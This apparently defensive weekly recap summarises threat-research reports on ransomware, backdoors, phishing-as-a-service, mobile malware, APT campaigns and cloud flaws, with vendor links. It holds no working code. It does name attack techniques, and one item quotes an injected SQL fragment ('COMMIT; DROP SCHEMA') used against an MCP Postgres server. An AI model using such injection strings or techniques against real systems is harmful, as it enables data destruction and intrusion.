![Threat Research | Weekly Recap [24 Aug 2025]](https://www.hendryadrian.com/tweet/image/WeeklyRecap.png "Threat Research | Weekly Recap [24 Aug 2025]")
The weekly Cybersecurity Threat Research recap highlights significant ransomware operations, including SharePoint exploitation by WarLock and advanced RaaS variants targeting multiple platforms. It also covers emerging backdoors like Cornflake V3 and PipeMagic, sophisticated phishing campaigns such as Salty 2FA, and targeted APT campaigns like APT36 and Static Tundra. #WarLock #CornflakeV3
Ransomware & extortion
- Rapid SharePoint RCE exploitation leading to enterprise-wide encryption and exfiltration; actor deployed the WarLock toolkit and leveraged SYSTEM privileges for lateral movement. WarLock: From SharePoint Exploit to Ransomware â TrendMicro
- New RaaS with advanced anti-analysis, UAC bypasses and expanded exfiltration options; operator markets builder/subscription services. Bqtlock Ransomware & Variants â K7 Labs
- Evolved RaaS family targeting Windows/Linux/ESXi with TOR leak sites and advanced obfuscation (Boramae-related variant noted). Beast Ransomware Profile â SOCRadar
Backdoors, loaders & modular frameworks
- Campaigns using fake CAPTCHA (ClickFix) lures and PowerShell/JS droppers to deliver the Node.js/PHP CORNFLAKE.V3 backdoor with AD reconnaissance and Kerberoasting. Cornflake V3 Backdoor â Google Cloud
- Modular namedâpipe backdoor masquerading as trojanized ChatGPT apps; exploits CVE-2025-29824 and manages in-memory modules for payload/injection. PipeMagic Analysis â Microsoft
- New and stealthy loaders/botnets: QuirkyLoader (.NET sideâloading/process hollowing delivering multiple RATs/stealers) and stealth Java loader âSoupDealerâ used in targeted phishing. QuirkyLoader â IBM XâForce
- Delphi x86 implant using heavy obfuscation, antiâanalysis and persistence for surveillance/exfiltration. DBatLoader. DBatLoader â DeepInstinct
- Novel Linux persistence/backdoor masquerading as PAM library to provide stealthy SSH auth bypass and persistence. Plague. Plague Linux PAM Backdoor â PolySwarm
- New Gh0st-based RAT targeting finance, uses steganography for shellcode and downloads plugins/password stealers; tracked as GodRAT. GodRAT â Kaspersky Securelist
Phishing, credential theft & PhaaS
- Spoofed SendGrid emails and open-redirects lure victims to credential harvesters capturing account logins. SendGrid-themed Credential Harvesting â Cofense
- AI website builder abused at scale for phishing, MFA/AiTM and crypto drainers; tens of thousands of malicious URLs observed. Lovable AI Abuse for Phishing â Proofpoint
- New Phishing-as-a-Service framework (Salty 2FA) uses multistage obfuscated JS and domain patterns to steal Microsoft 365 creds and bypass 2FA. Salty 2FA Technical Analysis â ANY.RUN
- Highâvalue socialâengineering group Scattered Spider (UNC3944) continues to evolve phishing kits (Evilginxâstyle) and targeting of corporate accounts. Scattered Spider Profile â DarkAtlas
- Large smishing wave impersonating UK gov services with shortâlived domains and token/websocket exfiltration behavior. UK GOV PCN/Winter Fuel Smishing â Validin
- Targeted stealer campaigns (copyright/corporate footprint lures) that focus on browser cookies and social accounts; Noodlophile evolution noted. Noodlophile Stealer â Morphisec
- Affiliate ecosystems monetizing stolen data (Lumma, Vidar, Stealc) with proxy/VPN/antidetect enablersâmonitor exfiltration and underground forums. Lumma Affiliate Ecosystem â Recorded Future
- JavaScript keyloggers injected into Exchange auth pages exfiltrate creds via HTTP/Telegram/DNSâwatch /owa/auth/logon.aspx modifications. Exchange JS Keyloggers â PT ESC
- VPS abuse to enable stealthy SaaS compromises (inbox rules, MFA bypass, token theft) and large-scale phishing footholds. SaaS Hijacks via VPS Abuse â Darktrace
Mobile & endpoint threats
- Android banking trojan Anatsa/TeaBot expanded targets (831+ apps), uses runtime DES decryption, device checks, and Google Play decoys for updates. Anatsa (TeaBot) Updates â Zscaler
- Sideloaded APK droppers delivering AndroidOS SpyNote RAT via cloned Play Store pages and DEX injection with antiâanalysis. SpyNote Malware â DomainTools
- NFCârelay Android malware targeting Brazilian banking (tap-to-pay fraud) delivered via fake Play pages; affiliate MaaS model. PhantomCard. PhantomCard NFC Relay â Zimperium
- APK lure impersonating Indian energy subsidy scheme to steal UPI credentials and SMS; repo/FCM mitigations applied. Android âEnergy Subsidyâ Stealer â McAfee
- macOS malvertising and oneâliner installers delivering SHAMOS (AMOS variant) to steal Keychain/notesâCrowdStrike Falcon blocked widespread attempts. SHAMOS on macOS â CrowdStrike
- Rooting/jailbreak frameworks (KernelSU, Magisk, APatch) have exploitable weaknesses that can let malicious apps gain full device control. Rooting Framework Risks â Zimperium
Abuse of legitimate tools, supply-chain & monetization schemes
- Phishing campaign used a fake digitalâsignature patch to install legitimate remoteâmanagement tool Action1 for unauthorized remote access. Fake Action1 Patch â CERTâAGID
- Fake YouTube downloader pages distributing Proxyware installers (WinMemoryCleaner droppers) that install clients like HoneyGain/Infatica and run scheduled Node.js/PowerShell tasks. Proxyware Distribution via Fake Downloader â AhnLab
- Attackers exploiting GeoServer RCE (CVEâ2024â36401) to deploy SDKs/apps that covertly sell victimsâ bandwidth as residential proxies. SDK Abuse to Monetize Bandwidth â Unit42
- Openâsource ecosystem abuse: malicious Go module masquerading as SSH bruteâforcer exfiltrates firstâsuccess creds to a Telegram bot. Malicious Go Module â Socket
- Large-scale trojan campaign forceâinstalls malicious Chrome/Edge extensions via fake installer sites, scheduled tasks and registry/policy abuseâ>300k+ affected. Extension Trojans via Fake Installers â ReasonLabs
Notable APT & targeted campaigns
- APT36 campaigns against Indian targets used weaponized .desktop files and Google Drive droppers to deliver Go-based ELF payloads targeting BOSS Linux systems (WebSocket C2s observed). APT36 Targeting BOSS Linux â Cyfirma
- Persistent campaign (UACâ0057 / UNC1151) deploying weaponized XLS (obfuscated VBA) against Ukraine/Poland with DLL implants and web C2s. UACâ0057 Targeting Ukraine & Poland â HarfangLab
- Longârunning Russian espionage group Static Tundra abuses EoL/unpatched network gear (Cisco Smart Install/CVEâ2018â0171) to steal configs and maintain long-term access. Static Tundra (FSB-linked) â Talos
- EncryptHub operation combining social engineering, Teams-based remote access, and exploitation of CVEâ2025â26633 to deliver backdoors and steal data. EncryptHub Campaign â Trustwave SpiderLabs
Vulnerabilities, cloud & infra research
- AWS Resource Explorer ListResources allowed quiet resource enumeration because it wasnât CloudTrailâlogged by default; AWS reclassified it as a management event after disclosure. CloudTrailâfree AWS enumeration â Datadog
- SQL injection in a reference Postgres MCP server could chain stacked statements (e.g., COMMIT; DROP SCHEMA) enabling arbitrary writes; patches released in forks. MCP Postgres SQLi Case Study â Datadog
- Research into programmatic start of the WebClient service shows multiple vectors but a final ETW consumer descriptor limits remote start without elevated token conditionsârelevant to NTLM relay mitigations. Will WebClient Start? â SpecterOps
Cryptojacking & illicit mining
- Long-running cryptomining group TAâNATALSTATUS exploits exposed Redis instances to gain root and deploy rootkitâstyle miners that kill rival miners and persist across thousands of hosts. TAâNATALSTATUS Cryptojacking Dossier â CloudSEK